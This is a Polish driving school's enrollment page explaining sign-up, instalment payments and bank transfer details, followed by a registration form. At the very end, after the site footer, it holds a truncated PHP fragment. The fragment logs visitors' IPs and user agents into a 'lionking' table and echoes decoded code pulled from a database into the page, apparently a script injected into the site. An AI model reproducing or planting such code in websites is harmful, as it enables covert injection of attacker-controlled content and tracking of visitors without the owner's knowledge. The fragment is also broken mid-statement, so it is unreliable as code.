Zapisy


Aby zapisać się na kurs prawa jazdy i tym samym rozpocząć szkolenie, nie ma potrzeby wcześniejszego przyjazdu do siedziby naszej firmy.

Wystarczy, że sprawdzisz w dziale kursy kiedy jest rozpoczęcie kursu w danym ośrodku, a następnie przyjdziesz na pierwsze zajęcia rozpoczynające kurs i na nich u wykładowcy zapiszesz się oraz dokonasz wpłaty.

Drugą metodą zapisu jest wcześniejsze dokonanie przelewu bankowego na numer konta podany na dole strony i z jego potwierdzeniem przybycie na pierwsze zajęcia.

Osoby, które chcą wcześniej osobiście zapisać się na dowolny z kursów zapraszamy do naszych biur, których adresy znajdziecie na stronie kontakt.

Dla tych osób, które nie mają możliwości w momencie zapisu opłacenia pełnej kwoty za szkolenie proponujemy system dogodnej spłaty ratalnej:
- w momencie zapisu należy wpłacić min. 300 zł
- resztę wpłacamy systematycznie w czasie trwania kursu

- system ratalny jest nieoprocentowany

Aby nie tracić czasu na pierwszych zajęciach rozpoczynających kurs omawiamy sprawy organizacyjne i prowadzimy pierwszy wykład.


Płatności przelewem:

Ośrodek Szkolenia Kierowców "WIRAŻ"
62 1050 1764 1000 0090 9418 7185

 

W opisie prosimy o podanie imienia i nazwiska uczestnika kursu, terminu rozpoczęcia kursu. Potwierdzenie dokonania przelewu prosimy dostarczyć instruktorowi prowadzącemu wykład.

Jeżeli już teraz jesteś zdecydowany zapisać się do nas na kurs możesz wypełnić poniższy formularz zgłoszeniowy:

*Dane są chronione zgodnie z ustawą "O ochronie danych osobowych (Dz. U. z 97 r. nr 133)


FORMULARZ ZGLOSZENIOWY
(pola oznaczone * są obowiązkowe)


Dane osobowe
Imię (*) 
Pole wymagane
Nazwisko (*) 
Pole wymagane
PESEL (*) 
Pole wymagane
Dane kontaktowe
Telefon kontaktowy (*) 
Pole wymagane
Adres e-mail 
Invalid Input
Adres
Ulica (*) 
Pole wymagane
Nr butynku / lokal (*) 
Pole wymagane
Miejscowość (*) 
Pole wymagane
Województwo (*) 
Pole wymagane
Kurs
Kategoria (*) 
Pole wymagane
Termin rozpoczęcia kursu (*) 
Pole wymagane
Skąd o nas wiesz? (*) 
Pole wymagane
Uwagi, komentarze 
Invalid Input
JoomShaper
= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>